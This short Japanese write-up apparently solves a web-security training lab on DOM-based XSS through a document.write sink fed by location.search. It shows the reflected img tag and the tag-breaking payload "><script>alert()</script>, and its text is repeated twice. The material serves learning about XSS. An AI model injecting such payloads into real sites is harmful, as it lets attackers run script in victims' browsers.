academy Lab DOM XSS in document.write sink using source location.search
domベース。
検索窓に何か文字をいれて検索
ソースを見ると、
<img src="/resources/images/tracker.gif?searchTerms=aaa">
imgタグを閉じるペイロードを..
"><script>alert()</script>
クリア!
–)v
academy Lab DOM XSS in document.write sink using source location.search
domベース。
検索窓に何か文字をいれて検索
ソースを見ると、
<img src="/resources/images/tracker.gif?searchTerms=aaa">
imgタグを閉じるペイロードを..
"><script>alert()</script>
クリア!
–)v
コメント